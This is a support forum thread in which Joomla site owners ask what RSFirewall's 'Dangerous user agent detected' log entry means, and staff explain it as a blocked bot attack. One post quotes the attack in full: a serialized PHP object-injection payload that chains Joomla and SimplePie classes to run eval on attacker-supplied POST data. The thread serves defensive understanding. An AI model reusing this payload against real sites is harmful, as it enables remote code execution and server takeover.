• 1

Read this first!

We do not monitor these forums. The forum is provided to exchange information and experience with other users ONLY. Forum responses are not guaranteed.

However, please submit a ticket if you have an active subscription and wish to receive support. Our ticketing system is the only way of getting in touch with RSJoomla! and receiving the official RSJoomla! Customer Support.

For more information, the Support Policy is located here.

Thank you!

TOPIC: Definition of Dangerous user agent detected

Definition of Dangerous user agent detected 9 years 4 months ago #33471

  • lrenshaw
  • lrenshaw's Avatar
  • OFFLINE
  • Fresh Boarder
  • Posts: 13
What does it mean when I see "Dangerous user agent detected" in my system log? Does that mean a hack attempt? I don't see any kind of definitions on your site for this stuff?
The administrator has disabled public write access.

Definition of Dangerous user agent detected 9 years 4 months ago #33472

  • info008
  • info008's Avatar
  • OFFLINE
  • Fresh Boarder
  • Posts: 2
This seems to be new functionality with an accompanying message I haven't seen before updating to 2.9.2 just now.

I'm curious as well and hoping for more information about what the villains are trying to achieve. :-)

Willy
The administrator has disabled public write access.

Definition of Dangerous user agent detected 9 years 4 months ago #33474

  • alexp
  • alexp's Avatar
  • OFFLINE
  • RSJoomla! Official Staff
  • Posts: 2253
  • Thank you received: 180
The latest Joomla! hacks that were reveled recently were performed via User Agent information. The latest RSFirewall! version incorporates an active scanner feature that detects user agents with potentially malicious data.

More on this topic on our blog.
Please note: my help is not official customer support. To receive your support, submit a ticket by clicking here
Regards,
RSJoomla! Development Team
The administrator has disabled public write access.

Definition of Dangerous user agent detected 9 years 3 months ago #33494

  • jengel
  • jengel's Avatar
  • OFFLINE
  • Fresh Boarder
  • Posts: 2
since 2.92. i see more Dangerous user agent are detected, this was not in earlier versions.
So i am also curious what is so dangerous in this what is detected?? :
Debug informatie
User agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:102:"eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST))))));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}
Last Edit: 9 years 3 months ago by jengel.
The administrator has disabled public write access.

Definition of Dangerous user agent detected 9 years 3 months ago #33502

  • alexp
  • alexp's Avatar
  • OFFLINE
  • RSJoomla! Official Staff
  • Posts: 2253
  • Thank you received: 180
It looks like some hacks were attempted on your Joomla! installation. The user agent information incorporates malware signatures. The latest Joomla! hacks are being performed via User Agent information.
Please note: my help is not official customer support. To receive your support, submit a ticket by clicking here
Regards,
RSJoomla! Development Team
The administrator has disabled public write access.

Definition of Dangerous user agent detected 9 years 3 months ago #33508

I have seen this warning but am unclear whether this means there is already malware on my webserver or it's just a remote attack that has been blocked. I did suffer an attack where a couple of core files got changed recently (probably that latest hack that's now been fixed) and am concerned there may be malware lurking somewhere on the server which I don't know about.

Could we have a bit more clarity on what this error message actually means - a hack attempt has been blocked or malware is already present on the server?
The administrator has disabled public write access.

Definition of Dangerous user agent detected 9 years 3 months ago #33510

  • alexp
  • alexp's Avatar
  • OFFLINE
  • RSJoomla! Official Staff
  • Posts: 2253
  • Thank you received: 180
This means that a site visitor (most likely a bot) that incorporated malicious code in its User Agent information has been blocked. It does not imply that your site has already been hacked. It would be best to run a System Check just to stay of the safe side.
Please note: my help is not official customer support. To receive your support, submit a ticket by clicking here
Regards,
RSJoomla! Development Team
The administrator has disabled public write access.

Definition of Dangerous user agent detected 9 years 3 months ago #33600

  • info5127
  • info5127's Avatar
  • OFFLINE
  • Fresh Boarder
  • Posts: 1
I have a related question, why does the back-end of my RSFirewall config show "block" instead of "unblock" for an attack that has occurred for "Dangerous user agent detected" event?

The administrator has disabled public write access.

Definition of Dangerous user agent detected 9 years 3 months ago #33602

  • alexp
  • alexp's Avatar
  • OFFLINE
  • RSJoomla! Official Staff
  • Posts: 2253
  • Thank you received: 180
The visitor that contained the malicious user agent never actually got to open your website. The "blocking" action is degined to restrict access for the visitor's IP address.
Please note: my help is not official customer support. To receive your support, submit a ticket by clicking here
Regards,
RSJoomla! Development Team
The administrator has disabled public write access.

Definition of Dangerous user agent detected 9 years 3 months ago #33606

  • info008
  • info008's Avatar
  • OFFLINE
  • Fresh Boarder
  • Posts: 2
An additional comment to Alexp's reply is that you could activate Automatic Blacklisting. Here you can also set the # of attempts that lead to automatic blacklisting. I have set it to 2, as the second attempt ascertains that we have a repeat offender.

See Firewall Configuration, Active Scanner.

Willy
The administrator has disabled public write access.
  • 1

Read this first!

We do not monitor these forums. The forum is provided to exchange information and experience with other users ONLY. Forum responses are not guaranteed.

However, please submit a ticket if you have an active subscription and wish to receive support. Our ticketing system is the only way of getting in touch with RSJoomla! and receiving the official RSJoomla! Customer Support.

For more information, the Support Policy is located here.

Thank you!